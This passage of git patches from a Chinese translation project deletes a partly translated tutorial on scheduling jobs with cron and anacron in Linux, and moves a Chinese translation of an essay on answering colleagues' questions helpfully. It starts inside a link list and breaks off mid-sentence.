+[1]:https://opensource.com/resources/what-is-linux?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[2]:https://opensource.com/resources/what-are-linux-containers?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[3]:https://developers.redhat.com/promotions/linux-cheatsheet/?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[4]:https://developers.redhat.com/cheat-sheet/advanced-linux-commands-cheatsheet?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[5]:https://opensource.com/tags/linux?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[6]:https://opensource.com/participate +[7]:https://opensource.com/users/brendang +[8]:https://opensource.com/users/brendang +[9]:https://opensource.com/user/77626/feed +[10]:https://opensource.com/article/17/11/bccbpf-performance?rate=r9hnbg3mvjFUC9FiBk9eL_ZLkioSC21SvICoaoJjaSM +[11]:https://opensource.com/article/17/11/bccbpf-performance#comments +[12]:https://github.com/iovisor/bcc +[13]:https://opensource.com/file/376856 +[14]:https://opensource.com/usr/share/bcc/tools/trace +[15]:https://github.com/brendangregg/perf-tools/blob/master/execsnoop +[16]:https://github.com/brendangregg/perf-tools/blob/master/opensnoop +[17]:https://github.com/iovisor/bcc/blob/master/tools/xfsslower.py +[18]:https://github.com/iovisor/bcc/blob/master/tools/biolatency.py +[19]:https://github.com/iovisor/bcc/blob/master/tools/tcplife.py +[20]:https://github.com/iovisor/bcc/blob/master/tools/gethostlatency.py +[21]:https://github.com/iovisor/bcc/blob/master/tools/trace.py +[22]:https://github.com/iovisor/bcc/blob/master/INSTALL.md#fedora---binary +[23]:https://www.iovisor.org/ +[24]:https://opensource.com/article/17/11/bccbpf-performance#InstallViaSource +[25]:https://github.com/iovisor/bcc/issues/1221 +[26]:https://reviews.llvm.org/rL302055 +[27]:https://github.com/iovisor/bcc/blob/master/INSTALL.md#fedora---source +[28]:https://github.com/iovisor/bcc +[29]:https://github.com/iovisor/ply +[30]:https://github.com/ajor/bpftrace +[31]:https://sourceware.org/systemtap/ +[32]:https://sourceware.org/ml/systemtap/2017-q4/msg00096.html +[33]:https://github.com/iovisor/bcc/blob/master/docs/tutorial_bcc_python_developer.md +[34]:https://github.com/iovisor/bcc/blob/master/tools/funccount_example.txt +[35]:https://github.com/iovisor/bcc/blob/master/tools/funclatency_example.txt +[36]:https://github.com/iovisor/bcc/blob/master/tools/funcslower_example.txt +[37]:https://github.com/iovisor/bcc/blob/master/tools/stackcount_example.txt +[38]:https://github.com/iovisor/bcc/blob/master/tools/trace_example.txt +[39]:https://github.com/iovisor/bcc/blob/master/tools/argdist_example.txt +[40]:http://opensource.com/ +[41]:https://opensource.com/tags/linux +[42]:https://opensource.com/tags/sysadmin +[43]:https://opensource.com/users/brendang +[44]:https://opensource.com/users/brendang From 97a0c97bd5089cded76d22ad63575ae28cfec558 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=BC=A0=E5=AE=88=E6=B0=B8?= Date: Fri, 8 Dec 2017 20:33:04 +0800 Subject: [PATCH 0420/1627] Delete 20171207 How to use cron in Linux.md --- .../20171207 How to use cron in Linux.md | 287 ------------------ 1 file changed, 287 deletions(-) delete mode 100644 sources/tech/20171207 How to use cron in Linux.md diff --git a/sources/tech/20171207 How to use cron in Linux.md b/sources/tech/20171207 How to use cron in Linux.md deleted file mode 100644 index 3df9c1b402..0000000000 --- a/sources/tech/20171207 How to use cron in Linux.md +++ /dev/null @@ -1,287 +0,0 @@ -translating by yongshouzhang - -如何在linux中使用cron -============================================================ - -### 没有时间键入命令? 使用 cron 调度任务意味着你不必熬夜守着程序,就可以让它运行。 - [![](https://opensource.com/sites/default/files/styles/byline_thumbnail/public/david-crop.jpg?itok=Wnz6HdS0)][10] 06 Nov 2017 [David Both][11] [Feed][12] - -27[up][13] - - [9 comments][14] -![如何在 linux 中使用cron](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/linux-penguins.png?itok=yKOpaJM_) - -Image by : - -[Internet Archive Book Images][15]. Modified by Opensource.com. [CC BY-SA 4.0][16] - -作为系统管理员的一个挑战(也是众多优势之一)就是在你想睡觉时如何让任务运行。例如,一些任务(包括定期循环的作业)需要整夜或每逢周末运行,当没人想占用计算机资源时。晚上我没有空闲时间去运行在非高峰时间必须运行的命令和脚本。我也不想摸黑起床,进行备份和主更新。 - -与之代替的是,我用了两个能够在既定时间运行命令,程序,任务的服务实用程序。[cron][17] 和 at 服务能够让系统管理雨在未来特定时间内运行计划任务。at 服务指定一个在特定时间运行的一次性任务。cron服务可在重复的基础上调度任务,如每天,每周或每月。 - -在本文中我将会介绍 cron 服务以及如何使用。 - -### cron 的常见(和不常见)用法 - -I use the cron service to schedule obvious things, such as regular backups that occur daily at 2 a.m. I also use it for less obvious things. - -* The system times (i.e., the operating system time) on my many computers are set using the Network Time Protocol (NTP). While NTP sets the system time, it does not set the hardware time, which can drift. I use cron to set the hardware time based on the system time. - -* I also have a Bash program I run early every morning that creates a new "message of the day" (MOTD) on each computer. It contains information, such as disk usage, that should be current in order to be useful. - -* Many system processes and services, like [Logwatch][1], [logrotate][2], and [Rootkit Hunter][3], use the cron service to schedule tasks and run programs every day. - -The crond daemon is the background service that enables cron functionality. - -The cron service checks for files in the /var/spool/cron and /etc/cron.d directories and the /etc/anacrontab file. The contents of these files define cron jobs that are to be run at various intervals. The individual user cron files are located in /var/spool/cron, and system services and applications generally add cron job files in the /etc/cron.ddirectory. The /etc/anacrontab is a special case that will be covered later in this article. - -### Using crontab - -The cron utility runs based on commands specified in a cron table (crontab). Each user, including root, can have a cron file. These files don't exist by default, but can be created in the /var/spool/cron directory using the crontab -e command that's also used to edit a cron file (see the script below). I strongly recommend that you not use a standard editor (such as Vi, Vim, Emacs, Nano, or any of the many other editors that are available). Using the crontab command not only allows you to edit the command, it also restarts the crond daemon when you save and exit the editor. The crontabcommand uses Vi as its underlying editor, because Vi is always present (on even the most basic of installations). - -New cron files are empty, so commands must be added from scratch. I added the job definition example below to my own cron files, just as a quick reference, so I know what the various parts of a command mean. Feel free to copy it for your own use. - -``` -# crontab -e -SHELL=/bin/bash -MAILTO=root@example.com -PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin - -# For details see man 4 crontabs - -# Example of job definition: -# .---------------- minute (0 - 59) -# | .------------- hour (0 - 23) -# | | .---------- day of month (1 - 31) -# | | | .------- month (1 - 12) OR jan,feb,mar,apr ... -# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat -# | | | | | -# * * * * * user-name command to be executed - -# backup using the rsbu program to the internal 4TB HDD and then 4TB external -01 01 * * * /usr/local/bin/rsbu -vbd1 ; /usr/local/bin/rsbu -vbd2 - -# Set the hardware clock to keep it in sync with the more accurate system clock -03 05 * * * /sbin/hwclock --systohc - -# Perform monthly updates on the first of the month -# 25 04 1 * * /usr/bin/dnf -y update -``` - -The first three lines in the code above set up a default environment. The environment must be set to whatever is necessary for a given user because cron does not provide an environment of any kind. The SHELL variable specifies the shell to use when commands are executed. This example specifies the Bash shell. The MAILTO variable sets the email address where cron job results will be sent. These emails can provide the status of the cron job (backups, updates, etc.) and consist of the output you would see if you ran the program manually from the command line. The third line sets up the PATH for the environment. Even though the path is set here, I always prepend the fully qualified path to each executable. - -There are several comment lines in the example above that detail the syntax required to define a cron job. I'll break those commands down, then add a few more to show you some more advanced capabilities of crontab files. - -``` -01 01 * * * /usr/local/bin/rsbu -vbd1 ; /usr/local/bin/rsbu -vbd2 -``` - -This line runs my self-written Bash shell script, rsbu, that backs up all my systems. This job kicks off at 1:01 a.m. (01 01) every day. The asterisks (*) in positions three, four, and five of the time specification are like file globs, or wildcards, for other time divisions; they specify "every day of the month," "every month," and "every day of the week." This line runs my backups twice; one backs up to an internal dedicated backup hard drive, and the other backs up to an external USB drive that I can take to the safe deposit box. - -The following line sets the hardware clock on the computer using the system clock as the source of an accurate time. This line is set to run at 5:03 a.m. (03 05) every day. - -``` -03 05 * * * /sbin/hwclock --systohc -``` - -I was using the third and final cron job (commented out) to perform a dnf or yumupdate at 04:25 a.m. on the first day of each month, but I commented it out so it no longer runs. - -``` -# 25 04 1 * * /usr/bin/dnf -y update -``` - -### Other scheduling tricks - -Now let's do some things that are a little more interesting than these basics. Suppose you want to run a particular job every Thursday at 3 p.m.: - -``` -00 15 * * Thu /usr/local/bin/mycronjob.sh -``` - -Or, maybe you need to run quarterly reports after the end of each quarter. The cron service has no option for "The last day of the month," so instead you can use the first day of the following month, as shown below. (This assumes that the data needed for the reports will be ready when the job is set to run.) - -``` -02 03 1 1,4,7,10 * /usr/local/bin/reports.sh -``` - -The following shows a job that runs one minute past every hour between 9:01 a.m. and 5:01 p.m. - -``` -01 09-17 * * * /usr/local/bin/hourlyreminder.sh -``` - -I have encountered situations where I need to run a job every two, three, or four hours. That can be accomplished by dividing the hours by the desired interval, such as */3 for every three hours, or 6-18/3 to run every three hours between 6 a.m. and 6 p.m. Other intervals can be divided similarly; for example, the expression */15 in the minutes position means "run the job every 15 minutes." - -``` -*/5 08-18/2 * * * /usr/local/bin/mycronjob.sh -``` - -One thing to note: The division expressions must result in a remainder of zero for the job to run. That's why, in this example, the job is set to run every five minutes (08:05, 08:10, 08:15, etc.) during even-numbered hours from 8 a.m. to 6 p.m., but not during any odd-numbered hours. For example, the job will not run at all from 9 p.m. to 9:59 a.m. - -I am sure you can come up with many other possibilities based on these examples. - -### Limiting cron access - -More Linux resources - -* [What is Linux?][4] - -* [What are Linux containers?][5] - -* [Download Now: Linux commands cheat sheet][6] - -* [Advanced Linux commands cheat sheet][7] - -* [Our latest Linux articles][8] - -Regular users with cron access could make mistakes that, for example, might cause system resources (such as memory and CPU time) to be swamped. To prevent possible misuse, the sysadmin can limit user access by creating a - -**/etc/cron.allow** - - file that contains a list of all users with permission to create cron jobs. The root user cannot be prevented from using cron. - -By preventing non-root users from creating their own cron jobs, it may be necessary for root to add their cron jobs to the root crontab. "But wait!" you say. "Doesn't that run those jobs as root?" Not necessarily. In the first example in this article, the username field shown in the comments can be used to specify the user ID a job is to have when it runs. This prevents the specified non-root user's jobs from running as root. The following example shows a job definition that runs a job as the user "student": - -``` -04 07 * * * student /usr/local/bin/mycronjob.sh -``` - -### cron.d - -The directory /etc/cron.d is where some applications, such as [SpamAssassin][18] and [sysstat][19], install cron files. Because there is no spamassassin or sysstat user, these programs need a place to locate cron files, so they are placed in /etc/cron.d. - -The /etc/cron.d/sysstat file below contains cron jobs that relate to system activity reporting (SAR). These cron files have the same format as a user cron file. - -``` -# Run system activity accounting tool every 10 minutes -*/10 * * * * root /usr/lib64/sa/sa1 1 1 -# Generate a daily summary of process accounting at 23:53 -53 23 * * * root /usr/lib64/sa/sa2 -A -``` - -The sysstat cron file has two lines that perform tasks. The first line runs the sa1program every 10 minutes to collect data stored in special binary files in the /var/log/sadirectory. Then, every night at 23:53, the sa2 program runs to create a daily summary. - -### Scheduling tips - -Some of the times I set in the crontab files seem rather random—and to some extent they are. Trying to schedule cron jobs can be challenging, especially as the number of jobs increases. I usually have only a few tasks to schedule on each of my computers, which is simpler than in some of the production and lab environments where I have worked. - -One system I administered had around a dozen cron jobs that ran every night and an additional three or four that ran on weekends or the first of the month. That was a challenge, because if too many jobs ran at the same time—especially the backups and compiles—the system would run out of RAM and nearly fill the swap file, which resulted in system thrashing while performance tanked, so nothing got done. We added more memory and improved how we scheduled tasks. We also removed a task that was very poorly written and used large amounts of memory. - -The crond service assumes that the host computer runs all the time. That means that if the computer is turned off during a period when cron jobs were scheduled to run, they will not run until the next time they are scheduled. This might cause problems if they are critical cron jobs. Fortunately, there is another option for running jobs at regular intervals: anacron. - -### anacron - -The [anacron][20] program performs the same function as crond, but it adds the ability to run jobs that were skipped, such as if the computer was off or otherwise unable to run the job for one or more cycles. This is very useful for laptops and other computers that are turned off or put into sleep mode. - -As soon as the computer is turned on and booted, anacron checks to see whether configured jobs missed their last scheduled run. If they have, those jobs run immediately, but only once (no matter how many cycles have been missed). For example, if a weekly job was not run for three weeks because the system was shut down while you were on vacation, it would be run soon after you turn the computer on, but only once, not three times. - -The anacron program provides some easy options for running regularly scheduled tasks. Just install your scripts in the /etc/cron.[hourly|daily|weekly|monthly]directories, depending how frequently they need to be run. - -How does this work? The sequence is simpler than it first appears. - -1. The crond service runs the cron job specified in /etc/cron.d/0hourly. - -``` -# Run the hourly jobs -SHELL=/bin/bash -PATH=/sbin:/bin:/usr/sbin:/usr/bin -MAILTO=root -01 * * * * root run-parts /etc/cron.hourly -``` - -1. The cron job specified in /etc/cron.d/0hourly runs the run-parts program once per hour. - -2. The run-parts program runs all the scripts located in the /etc/cron.hourlydirectory. - -3. The /etc/cron.hourly directory contains the 0anacron script, which runs the anacron program using the /etdc/anacrontab configuration file shown here. - -``` -# /etc/anacrontab: configuration file for anacron - -# See anacron(8) and anacrontab(5) for details. - -SHELL=/bin/sh -PATH=/sbin:/bin:/usr/sbin:/usr/bin -MAILTO=root -# the maximal random delay added to the base delay of the jobs -RANDOM_DELAY=45 -# the jobs will be started during the following hours only -START_HOURS_RANGE=3-22 - -#period in days delay in minutes job-identifier command -1 5 cron.daily nice run-parts /etc/cron.daily -7 25 cron.weekly nice run-parts /etc/cron.weekly -@monthly 45 cron.monthly nice run-parts /etc/cron.monthly -``` - -1. The anacron program runs the programs located in /etc/cron.daily once per day; it runs the jobs located in /etc/cron.weekly once per week, and the jobs in cron.monthly once per month. Note the specified delay times in each line that help prevent these jobs from overlapping themselves and other cron jobs. - -Instead of placing complete Bash programs in the cron.X directories, I install them in the /usr/local/bin directory, which allows me to run them easily from the command line. Then I add a symlink in the appropriate cron directory, such as /etc/cron.daily. - -The anacron program is not designed to run programs at specific times. Rather, it is intended to run programs at intervals that begin at the specified times, such as 3 a.m. (see the START_HOURS_RANGE line in the script just above) of each day, on Sunday (to begin the week), and on the first day of the month. If any one or more cycles are missed, anacron will run the missed jobs once, as soon as possible. - -### More on setting limits - -I use most of these methods for scheduling tasks to run on my computers. All those tasks are ones that need to run with root privileges. It's rare in my experience that regular users really need a cron job. One case was a developer user who needed a cron job to kick off a daily compile in a development lab. - -It is important to restrict access to cron functions by non-root users. However, there are circumstances when a user needs to set a task to run at pre-specified times, and cron can allow them to do that. Many users do not understand how to properly configure these tasks using cron and they make mistakes. Those mistakes may be harmless, but, more often than not, they can cause problems. By setting functional policies that cause users to interact with the sysadmin, individual cron jobs are much less likely to interfere with other users and other system functions. - -It is possible to set limits on the total resources that can be allocated to individual users or groups, but that is an article for another time. - -For more information, the man pages for [cron][21], [crontab][22], [anacron][23], [anacrontab][24], and [run-parts][25] all have excellent information and descriptions of how the cron system works. - -### Topics - - [Linux][26][SysAdmin][27] - -### About the author - - [![](https://opensource.com/sites/default/files/styles/profile_pictures/public/david-crop.jpg?itok=oePpOpyV)][28] David Both - -- - - David Both is a Linux and Open Source advocate who resides in Raleigh, North Carolina. He has been in the IT industry for over forty years and taught OS/2 for IBM where he worked for over 20 years. While at IBM, he wrote the first training course for the original IBM PC in 1981\. He has taught RHCE classes for Red Hat and has worked at MCI Worldcom, Cisco, and the State of North Carolina. He has been working with Linux and Open Source Software for almost 20 years. David has written articles for... [more about David Both][29][More about me][30] - -* [Learn how you can contribute][9] - --------------------------------------------------------------------------------- - -via: https://opensource.com/article/17/11/how-use-cron-linux - -作者:[David Both ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]: -[1]:https://sourceforge.net/projects/logwatch/files/ -[2]:https://github.com/logrotate/logrotate -[3]:http://rkhunter.sourceforge.net/ -[4]:https://opensource.com/resources/what-is-linux?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[5]:https://opensource.com/resources/what-are-linux-containers?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[6]:https://developers.redhat.com/promotions/linux-cheatsheet/?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[7]:https://developers.redhat.com/cheat-sheet/advanced-linux-commands-cheatsheet?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[8]:https://opensource.com/tags/linux?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[9]:https://opensource.com/participate -[10]:https://opensource.com/users/dboth -[11]:https://opensource.com/users/dboth -[12]:https://opensource.com/user/14106/feed -[13]:https://opensource.com/article/17/11/how-use-cron-linux?rate=9R7lrdQXsne44wxIh0Wu91ytYaxxi86zT1-uHo1a1IU -[14]:https://opensource.com/article/17/11/how-use-cron-linux#comments -[15]:https://www.flickr.com/photos/internetarchivebookimages/20570945848/in/photolist-xkMtw9-xA5zGL-tEQLWZ-wFwzFM-aNwxgn-aFdWBj-uyFKYv-7ZCCBU-obY1yX-UAPafA-otBzDF-ovdDo6-7doxUH-obYkeH-9XbHKV-8Zk4qi-apz7Ky-apz8Qu-8ZoaWG-orziEy-aNwxC6-od8NTv-apwpMr-8Zk4vn-UAP9Sb-otVa3R-apz6Cb-9EMPj6-eKfyEL-cv5mwu-otTtHk-7YjK1J-ovhxf6-otCg2K-8ZoaJf-UAPakL-8Zo8j7-8Zk74v-otp4Ls-8Zo8h7-i7xvpR-otSosT-9EMPja-8Zk6Zi-XHpSDB-hLkuF3-of24Gf-ouN1Gv-fJzkJS-icfbY9 -[16]:https://creativecommons.org/licenses/by-sa/4.0/ -[17]:https://en.wikipedia.org/wiki/Cron -[18]:http://spamassassin.apache.org/ -[19]:https://github.com/sysstat/sysstat -[20]:https://en.wikipedia.org/wiki/Anacron -[21]:http://man7.org/linux/man-pages/man8/cron.8.html -[22]:http://man7.org/linux/man-pages/man5/crontab.5.html -[23]:http://man7.org/linux/man-pages/man8/anacron.8.html -[24]:http://man7.org/linux/man-pages/man5/anacrontab.5.html -[25]:http://manpages.ubuntu.com/manpages/zesty/man8/run-parts.8.html -[26]:https://opensource.com/tags/linux -[27]:https://opensource.com/tags/sysadmin -[28]:https://opensource.com/users/dboth -[29]:https://opensource.com/users/dboth -[30]:https://opensource.com/users/dboth From 5a3649a288ecfd0bc57d9dcba700eea20e07d7e9 Mon Sep 17 00:00:00 2001 From: Trsky <625310581@qq.com> Date: Fri, 8 Dec 2017 21:20:22 +0800 Subject: [PATCH 0421/1627] complete the translation --- ...ow to answer questions in a helpful way.md | 186 ------------------ 1 file changed, 186 deletions(-) delete mode 100644 sources/tech/20170921 How to answer questions in a helpful way.md diff --git a/sources/tech/20170921 How to answer questions in a helpful way.md b/sources/tech/20170921 How to answer questions in a helpful way.md deleted file mode 100644 index 1cd590bdd2..0000000000 --- a/sources/tech/20170921 How to answer questions in a helpful way.md +++ /dev/null @@ -1,186 +0,0 @@ - -如何合理地回答问题 -============================= - -如果你的同事问你一个不太清晰的问题,你会怎么回答?我认为提问题是一种技巧(可以看 [如何提出有意义的问题][1]) 同时,合理地回答问题也是一种技巧。他们都是非常实用的。 - -开始 - 有时向你提问的人不尊重你的时间,这很糟糕。 - -我假设 - 我们假设问你问题的人是一个合理的人并且正在尽力解决问题而你想帮助他们。和我一起工作的人是这样,我所生活的世界也是这样。 - -下面是有助于回答问题的一些策略! - -### 如果他们提问不清楚,帮他们澄清 - -通常初学者不会提出很清晰的问题,或者问一些对回答问题没有必要信息的问题。 - -* ** 重述为一个更明确的问题 ** 回复他们(”你是想问 X ?“) - -* ** 问他们更具体的信息 ** 他们并没有提供(”你使用 IPv6 ?”) - -* ** 问是什么导致了他们的问题 ** 例如,有时有些人会进入我的团队频道,询问我们的 service discovery 如何工作的。这通常是因为他们试图设置/重新配置服务。在这种情况下,如果问“你正在使用哪种服务?可以给我看看你正在进行的 pull 请求吗?”是有帮助的。 - -这些策略很多来自 [如何提出有意义的问题][2]中的要点。(尽管我永远不会对某人说“噢,你得先看完文档 “如何提出有意义的问题” 再来问我问题) - - -### 明白什么是他们已经知道的 - -在回答问题之前,知道对方已经知道什么是非常有用的! - -Harold Treen 给了我一个很好的例子: - -> 前几天,有人请我解释“ Redux-Sagas ”。与其深入解释不如说“ 他们就像 worker threads 监听行为,让你更新 Redux store 。 - -> 我开始搞清楚他们对 Redux 、行为(actions)、store 以及其他基本概念了解多少。将这些概念都联系在一起再来解释会容易得多。 - -弄清楚问你问题的人已经知道什么是非常重要的。因为有时他们可能会对基础概念感到疑惑(“ Redux 是什么?“),或者他们可是专家但是恰巧遇到了微妙的极端情况(corner case)。如果答案建立在他们不知道的概念上会令他们困惑,但如果重述他们已经知道的的又会是乏味的。 - -这里有一个很实用的技巧来了解他们已经知道什么 - 比如可以尝试用“你对 X 了解多少?”而不是问“你知道 X 吗?”。 - -### 给他们一个文档 - -“RTFM” (“去读那些他妈的手册”(Read The Fucking Manual))是一个典型的无用的回答,但事实上如果向他们指明一个特定的文档会是非常有用的!当我提问题的时候,我非常乐意被指明那些事实上能够解决我的问题的文档,因为它可能解决了其他我也想问的问题。 - -我认为明确你所指明的文档确实能够解决问题或者至少经过查阅明确它有用是非常重要的。否则,你可能将以下面这种情形结束对话(非常常见): - -* Ali:我应该如何处理 X ? - -* Jada:<文档链接> - -* Ali: 这个并有实际解释如何处理 X ,它仅仅解释了如何处理 Y ! - -如果我所给的文档特别长,我会指明文档中那个我将会谈及的特定部分。[bash 手册][3] 有44000个字(真的!),所以如果只说“它在 bash 手册中有说明”是没有帮助的:) - -### 告诉他们一个有用的搜索 - -在工作中,我经常发现我可以利用我所知道的关键字进行搜索找到能够解决我的问题的答案。对于初学者来说,这些关键字往往不是那么明显。所以说“这是我用来寻找这个答案的搜索”可能有用些。再次说明,回答时请经检查后以确保搜索能够得到他们所需要的答案:) - -### 写新文档 - -人们经常一次又一次地问我的团队重复的问题。很显然这并不是人们的错(他们怎么能够知道在他们之前已经有10个人问了这个问题,且知道答案是什么呢?)因此,我们尝试写文档,而不是直接回答回答问题。 - -1. 马上写新文档 - -2. 给他们我们刚刚写好的新文档 - -3. 公示 - -写文档有时往往比回答问题需要花很多时间,但这是值得的。写文档尤其值得如果: - -a. 这个问题被问了一遍又一遍 - -b. 随着时间的推移,这个答案不会变化太大(如果这个答案每一个星期或者一个月就会变化,文档就会过时并且令人受挫) - -### 解释你做了什么 - -对于一个话题,作为初学者来说,这样的交流会真让人沮丧: - -* 新人:“hey 你如何处理 X ?” - -* 有经验的人:“我做了,它完成了” - -* 新人:”...... 但是你做了什么?!“ - -如果问你问题的人想知道事情是如何进行的,这样是有帮助的: - -* 让他们去完成任务而不是自己做 - -* 把你是如何得到你给他们的答案的步骤告诉他们。 - -这可能比你自己做的时间还要长,但对于被问的人来说这是一个学习机会,因为那样做使得他们将来能够更好地解决问题。 - -这样,你可以进行更好的交流,像这: - -* 新人:“这个网站出现了错误,发生了什么?” - -* 有经验的人:(2分钟后)”oh 这是因为发生了数据库故障转移“ - -* 新人: ”你是怎么知道的??!?!?“ - -* 有经验的人:“以下是我所做的!“: - - 1. 通常这些错误是因为服务器 Y 被关闭了。我查看了一下 `$PLACE` 但它表明服务器 Y 开着。所以,并不是这个原因导致的。 - - 2. 然后我查看仪表 X ,这个仪表的这个部分显示这里发生了数据库故障转移。 - - 3. 然后我在日志中找到了相应服务器,并且它显示连接数据库错误,看起来错误就是这里。 - -如果你正在解释你是如何调试一个问题,解释你是如何发现问题,以及如何找出问题是非常有用的当看起来似乎你已经得到正确答案时,感觉是很棒的。这比你帮助他人提高学习和诊断能力以及明白充分利用可用资源的感觉还要好。 - -### 解决根本问题 - -这一点有点狡猾。有时候人们认为他们依旧找到了解决问题的正确途径,且他们只需要一条信息就可以把问题解决。但他们可能并不是走在正确的道路上!比如: - -* George:”我在处理 X 的时候遇到了错误,我该如何修复它?“ - -* Jasminda:”你是正在尝试解决 Y 吗?如果是这样,你不应该处理 X ,反而你应该处理 Z 。“ - -* George:“噢,你是对的!!!谢谢你!我回反过来处理 Z 的。“ - -Jasminda 一点都没有回答 George 的问题!反而,她猜测 George 并不想处理 X ,并且她是猜对了。这是非常有用的! - -如果你这样做可能会产生居高临下的感觉: - -* George:”我在处理 X 的时候遇到了错误,我该如何修复它?“ - -* Jasminda:不要这样做,如果你想处理 Y ,你应该反过来完成 Z 。 - -* George:“好吧,我并不是想处理 Y 。实际上我想处理 X 因为某些原因(REASONS)。所以我该如何处理 X 。 - -所以不要居高临下,且要记住有时有些提问者可能已经偏离根本问题很远了。同时回答提问者提出的问题以及他们本该提出的问题的恰当的:“嗯,如果你想处理 X ,那么你可能需要这么做,但如果你想用这个解决 Y 问题,可能通过处理其他事情你可以更好地解决这个问题,这就是为什么可以做得更好的原因。 - -### 询问”那个回答可以解决您的问题吗?” - -我总是喜欢在我回答了问题之后核实是否真的已经解决了问题:”那个回答解决了您的问题吗?您还有其他问题吗?“在问完这个之后等待一会是很好的,因为人们通常需要一两分钟来知道他们是否已经找到了答案。 - -我发现尤其是问“这个回答解决了您的问题吗”这句在写文档时是非常有用的。通常,在写我关于我熟悉的东西的文档时,我会忽略掉重要的东西。 - -### Offer to。。。。 - -我是远程工作的,所以我的很多对话都是基于文本的。我认为这是默认的沟通方式。 - -今天,我们生活在一个简单的视频会议和屏幕共享的世界!在工作时候,我可以在任何时间点击一个按钮并快速处在与他人的视频对话或者屏幕共享的对话中! - -例如,最近有人问我关于容量规划/自动缩放。。。 - -### 不要表现得过于惊讶 - -这是源自 Recurse Center 的一则法则:[不要假装惊讶][4]。这里有一个常见的情景: - -* 某人1:“什么是 Linux 内核” - -* 某人2:“你竟然不知道什么是 Linux 内核(LINUX KERNEL)?!!!!?!!!????” - -某人2表现(无论他们是否真的如此惊讶)是没有帮助的。这大部分只会让某人1感觉不好,因为他们不知道什么的 Linux 内核。 - -我一直在假装不惊讶即使我事实上确实有点惊讶那个人不知道这种东西但它是令人敬畏的。 - -### 回答问题是令人敬畏的 - -很显然,这些策略并不是一直都是适当的,但希望你能够发现这里有些是有用的!我发现花时间去回答问题并教人们是其实是很有收获的。 - -特别感谢 Josh Triplett 的一些建议并做了很多有益的补充,以及感谢 Harold Treen、Vaibhav Sagar、Peter Bhat Hatkins、Wesley Aptekar Cassels 和 Paul Gowder的阅读或评论。 - --------------------------------------------------------------------------------- - -via: https://jvns.ca/blog/answer-questions-well/ - -作者:[ Julia Evans][a] -译者:[HardworkFish](https://github.com/HardworkFish) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://jvns.ca/about -[1]:https://jvns.ca/blog/good-questions/ -[2]:https://jvns.ca/blog/good-questions/ -[3]:https://linux.die.net/man/1/bash -[4]:https://jvns.ca/blog/2017/04/27/no-feigning-surprise/ - - - - - - - - From 0668a38da02d3ee3741e16fe8fc0f5646e0f9e42 Mon Sep 17 00:00:00 2001 From: Trsky <625310581@qq.com> Date: Fri, 8 Dec 2017 21:21:08 +0800 Subject: [PATCH 0422/1627] translated by HardworkFish --- ...ow to answer questions in a helpful way.md | 197 ++++++++++++++++++ 1 file changed, 197 insertions(+) create mode 100644 translated/tech/20170921 How to answer questions in a helpful way.md diff --git a/translated/tech/20170921 How to answer questions in a helpful way.md b/translated/tech/20170921 How to answer questions in a helpful way.md new file mode 100644 index 0000000000..acc67fd10c --- /dev/null +++ b/translated/tech/20170921 How to answer questions in a helpful way.md @@ -0,0 +1,197 @@ + +如何提供有帮助的回答 +============================= + +如果你的同事问你一个不太清晰的问题,你会怎么回答?我认为提问题是一种技巧(可以看 [如何提出有意义的问题][1]) 同时,合理地回答问题也是一种技巧。他们都是非常实用的。 + +一开始 - 有时向你提问的人不尊重你的时间,这很糟糕。 + +理想情况下,我们假设问你问题的人是一个理性的人并且正在尽力解决问题而你想帮助他们。和我一起工作的人是这样,我所生活的世界也是这样。当然,现实生活并不是这样。 + +下面是有助于回答问题的一些方法! + + +### 如果他们提问不清楚,帮他们澄清 + +通常初学者不会提出很清晰的问题,或者问一些对回答问题没有必要信息的问题。你可以尝试以下方法 澄清问题: + +* ** 重述为一个更明确的问题 ** 来回复他们(”你是想问 X 吗?“) + +* ** 向他们了解更具体的他们并没有提供的信息 ** (”你使用 IPv6 ?”) + +* ** 问是什么导致了他们的问题 ** 例如,有时有些人会进入我的团队频道,询问我们的服务发现(service discovery )如何工作的。这通常是因为他们试图设置/重新配置服务。在这种情况下,如果问“你正在使用哪种服务?可以给我看看你正在处理的 pull requests 吗?”是有帮助的。 + +这些方法很多来自 [如何提出有意义的问题][2]中的要点。(尽管我永远不会对某人说“噢,你得先看完 “如何提出有意义的问题”这篇文章后再来像我提问) + + +### 弄清楚他们已经知道了什么 + +在回答问题之前,知道对方已经知道什么是非常有用的! + +Harold Treen 给了我一个很好的例子: + +> 前几天,有人请我解释“ Redux-Sagas ”。与其深入解释不如说“ 他们就像 worker threads 监听行为(actions),让你更新 Redux store 。 + +> 我开始搞清楚他们对 Redux 、行为(actions)、store 以及其他基本概念了解多少。将这些概念都联系在一起再来解释会容易得多。 + +弄清楚问你问题的人已经知道什么是非常重要的。因为有时他们可能会对基础概念感到疑惑(“ Redux 是什么?“),或者他们可能是专家但是恰巧遇到了微妙的极端情况(corner case)。如果答案建立在他们不知道的概念上会令他们困惑,但如果重述他们已经知道的的又会是乏味的。 + +这里有一个很实用的技巧来了解他们已经知道什么 - 比如可以尝试用“你对 X 了解多少?”而不是问“你知道 X 吗?”。 + + +### 给他们一个文档 + +“RTFM” 